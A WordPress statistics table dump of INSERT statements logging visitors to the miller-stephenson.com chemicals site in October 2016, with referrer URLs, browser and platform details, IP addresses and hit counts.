INSERT INTO `wp_statistics_visitor` VALUES (1450, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '28.0.1464.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1451, '2016-10-07', 'https://search.myway.com/search/GGmain.jhtml?searchfor=miller+stephenson+ct&n=781bb103&p2=%5EUX%5Exdm297%5ETTAB02%5Eus&ptb=CA1D4871-02FA-42CD-9608-A36A6F898DAE&qs=&si=49588&ss=sub&st=tab&tpr=sbt&ts=1475868516381', 'Chrome', 'Windows', '53.0.2785.116', '', '76.0.175.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1452, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '9.0', '', '24.207.74.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1453, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '4.0', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1454, '2016-10-07', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/connector-lubricants/', 'Firefox', 'Windows', '49.0', '', '12.205.160.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1455, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '132.3.65.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1456, '2016-10-07', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '132.3.65.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1457, '2016-10-07', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '132.3.65.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1458, '2016-10-07', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/', 'Safari', 'iPhone', '7.0', '', '157.55.2.175', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1459, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '211.170.68.83', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1460, '2016-10-07', 'https://www.miller-stephenson.com/chemicals/lubricants/', 'Safari', 'iPhone', '7.0', '', '157.55.12.88', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1461, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '211.170.68.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1462, '2016-10-07', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.7.0', '', '216.243.77.196', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1463, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '10.0.3', '', '216.243.77.196', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1464, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1465, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1466, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.65.78', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1467, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.175.12.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1468, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.205.235.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1469, '2016-10-07', 'https://www.google.com', 'Firefox', 'Windows', '28.0', '', '54.70.87.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1470, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '184.101.174.159', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1471, '2016-10-07', 'https://www.google.co.uk/', 'Safari', 'iPhone', '10.0', '', '80.110.66.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1472, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiamtv_wsnPAhXDWD4KHZF3D1sQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.cWw', 'MSIE', 'Windows', '11.0', '', '72.86.170.194', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1473, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.53.165.141', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1474, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjniqOWxsnPAhXERCYKHZ9VCp0QFggnMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&v6u=httpss%3A%2F%2Fs-v6exp1-ds.metric.gstatic.com%2Fgen_204%3Fip%3D192.107.156.198%26ts%3D1475871979511480%26auth%3Dkxmmkumjzh3ukceoosx3r6fa4tzww6uf%26rndm%3D0.07038616032803052&v6s=2&v6t=97914&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '137.237.240.61', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1475, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1476, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.71.25.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1477, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '130.74.180.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1478, '2016-10-07', 'https://www.bing.com/search?q=miller+stephenson&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '67.133.81.166', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1479, '2016-10-07', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '38.104.254.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1480, '2016-10-07', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1481, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '49.0.2623.112', '', '98.229.186.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1482, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1483, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', 'or', '', '203.133.170.212', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1484, '2016-10-07', 'https://www.souvenirua.com/', 'MSIE', 'Windows', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1485, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '47.19.9.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1486, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0ahUKEwimlJLEysnPAhVY1GMKHdJMA6AQ_BcIcjAO&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.cGc', 'MSIE', 'Windows', '11.0', '', '12.38.142.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1487, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiguefYzMnPAhVFTCYKHZKiCBMQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Frelease_agents.html&usg=AFQjCNEtml3Wnf9B2NvctrDFppdhnpqPXA&sig2=wfdkW2y16DzD4qq1skhBCQ&bvm=bv.135258522,d.eWE', 'MSIE', 'Windows', '11.0', '', '199.106.175.224', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1488, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2704.106', '', '10.172.129.160', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1489, '2016-10-07', 'https://www.miller-stephenson.com/miller/conformal_coating.html', 'MSIE', 'Windows', '9.0', '', '182.118.25.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1490, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.176.202.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1491, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '150.70.188.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1492, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.53.68.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1493, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '182.69.215.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1494, '2016-10-07', 'https://www.google.co.il/', 'Chrome', 'Windows', '49.0.2623.112', '', '46.121.192.91', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1495, '2016-10-07', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwi21ouw0cnPAhVRgX4KHZtKBlgYABAA&sig=AOD64_2XGJMGStQVoy6gFWqaOVj56aWqWg&rct=j&q=&ved=0ahUKEwjGsYiw0cnPAhUO8mMKHWTeDx8Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '76.11.51.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1496, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjgpej50cnPAhWlx4MKHdfhCLIQFgg8MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FCuring%2520Agent.pdf&usg=AFQjCNHxwVqX5A1fMEHEn-MeptfpRg-BrQ', 'MSIE', 'Windows', '11.0', '', '205.235.104.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1497, '2016-10-07', 'https://www.miller-stephenson.com/products/detail.aspx?itemid=62', 'Chrome', 'Windows', '21.0.1180.89', '', '101.226.169.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1498, '2016-10-07', 'https://www.miller-stephenson.com/category/miller-stephenson-articles/', 'MSIE', 'Windows', '9.0', '', '182.118.21.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1499, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.121', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1500, '2016-10-07', 'https://www.miller-stephenson.com/product/krytox-nrt-plss/', 'MSIE', 'Windows', '9.0', '', '204.79.180.41', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1501, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '50.109.85.249', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1502, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '180.153.180.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1503, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '180.153.180.124', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1504, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '68.7.23.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1505, '2016-10-07', 'https://www.bing.com/search?q=epikure+curing+agent+w+sds&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1506, '2016-10-07', 'https://www.miller-stephenson.com/product/epikure-w/', 'MSIE', 'Windows', '9.0', '', '204.79.180.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1507, '2016-10-07', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj22-OB4MnPAhUUgn4KHf-GADkYABAA&sig=AOD64_28MgN6y5kRnYuMm5C3635d2VZ5WQ&rct=j&q=&ved=0ahUKEwiYhOGB4MnPAhUI42MKHduBACwQ0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '66.58.248.73', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1508, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '129.15.31.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1509, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.167', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1510, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '202.46.56.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1511, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '221.234.44.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1512, '2016-10-07', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '199.30.25.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1513, '2016-10-07', 'https://server-d/almacen/douglas/request_list.php', 'MSIE', 'Windows', '11.0', '', '174.30.151.58', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1514, '2016-10-07', 'https://www.google.co.uk/', 'Firefox', 'Windows', '49.0', '', '130.209.155.75', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1515, '2016-10-07', 'https://www.miller-stephenson.com/about_us.aspx', 'MSIE', 'Windows', '9.0', '', '182.118.21.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1516, '2016-10-07', 'https://www.google.co.uk/url?sa=t&source=web&cd=1', 'Chrome', 'Linux', '46.0.2490.80', '', '144.76.13.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1517, '2016-10-07', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '38.133.90.8', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1518, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.59.67.120', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1519, '2016-10-07', 'https://www.google.com.bo/', 'Chrome', 'Windows', '53.0.2785.143', '', '181.115.140.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1520, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '73.46.207.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1521, '2016-10-07', 'https://www.adsensecustomsearchads.com/afs/ads?q=teflon%20oir%20silicon%20metal%20roof%20spray%20coating&adpage=1&ccfn=amazon_search_numbered_narrow_15px_title&r=m&fexp=21404&client=amazon&channel=g-channel-92%2Bg-channel-133%2Bg-channel-338&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&format=n5&ad=n5&nocache=6781475883788748&num=0&output=uds_ads_only&v=3&bsl=10&u_his=3&u_tz=-300&dt=1475883788749&u_w=1024&u_h=819&biw=-12245933&bih=-12245933&isw=780&ish=1&psw=780&psh=0&frm=2&uio=uv3-&jsv=91621&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '75.121.140.158', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1522, '2016-10-07', 'https://www.google.ca/', 'Chrome', 'Android', '53.0.2785.124', '', '70.31.67.35', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1523, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.210.45.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1524, '2016-10-08', 'https://www.miller-stephenson.com/wp-admin/edit.php?post_type=product', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 670, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1525, '2016-10-08', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.14', '', '52.51.79.45', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1526, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.59.67.120', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1527, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1528, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '172.4.154.134', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1529, '2016-10-08', 'https://www.bing.com/search?q=EPIKURE+3223+SDS&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1530, '2016-10-08', 'https://www.miller-stephenson.com/product/epikure-3223/', 'MSIE', 'Windows', '9.0', '', '204.79.180.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1531, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.247.126.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1532, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '99.6.200.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1533, '2016-10-08', 'https://www.google.co.jp/', 'Chrome', 'Windows', '45.0.2454.85', '', '10.2.70.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1534, '2016-10-08', 'https://www.google.com', 'Firefox', 'Windows', '31.0', '', '52.89.12.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1535, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 44, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1536, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1537, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1538, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.244.82.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1539, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '74.113.174.67', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1540, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1541, '2016-10-08', 'https://www.miller-stephenson.com/product/heloxy-48/', 'MSIE', 'Windows', '9.0', '', '204.79.180.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1542, '2016-10-08', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '24.193.209.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1543, '2016-10-08', 'https://www.miller-stephenson.com', 'Drupal', 'Unknown', 'Unknown', '', '162.209.95.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1544, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.247.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1545, '2016-10-08', 'https://www.google.com/search?q=stephenson+chemical+company+insect+killer+EPA+Est.4887-SA-1&prmd=mnsiv&filter=0&biw=360&bih=615', 'Chrome', 'Android', '38.0.2125.102', '', '198.223.207.163', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1546, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '199.64.7.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1547, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '74.208.16.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1548, '2016-10-08', 'https://shmetall.com.ua/', 'Opera', 'Windows', '7.54', '', '46.118.155.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1549, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1550, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1551, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.87.15.38', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1552, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.167.183.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1553, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '37.60.247.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1554, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.87.142.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1555, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.3.180.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1556, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '5.0', '', '146.120.158.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1557, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '4.0', '', '31.132.79.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1558, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '189.113.168.101', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1559, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1560, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1561, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.152.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1562, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '38.0', '', '104.239.198.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1563, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.244.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1564, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.130.64.13', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1565, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.210.45.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1566, '2016-10-08', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '107.3.95.149', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1567, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.94', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1568, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.75', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1569, '2016-10-08', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1570, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '10.191.169.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1571, '2016-10-08', 'https://www.miller-stephenson.com/', 'Chrome', 'Android', '27.0.1453', '', '65.57.245.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1572, '2016-10-08', 'https://www.google.com', 'Firefox', 'Windows', '28.0', '', '52.89.12.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1573, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.22', '', '110.84.169.46', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1574, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '134.223.116.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1575, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1576, '2016-10-08', 'https://www.miller-stephenson.com/product/krytox-gpl-107/', 'MSIE', 'Windows', '9.0', '', '204.79.180.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1577, '2016-10-08', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '166.216.157.128', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1578, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.85.170.112', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1579, '2016-10-08', 'https://www.bing.com/search?q=epon+828&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.231', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1580, '2016-10-08', 'https://www.miller-stephenson.com/product/epon-828/', 'MSIE', 'Windows', '9.0', '', '204.79.180.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1581, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '222.72.71.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1582, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '27.38.35.221', '000', 41, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1583, '2016-10-08', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '192.126.162.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1584, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1585, '2016-10-08', 'https://www.miller-stephenson.com/specialty-products-solvents/', 'MSIE', 'Windows', '9.0', '', '204.79.180.59', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1586, '2016-10-08', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '23.16.225.94', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1587, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1588, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '184.95.51.190', '000', 10, 0); 
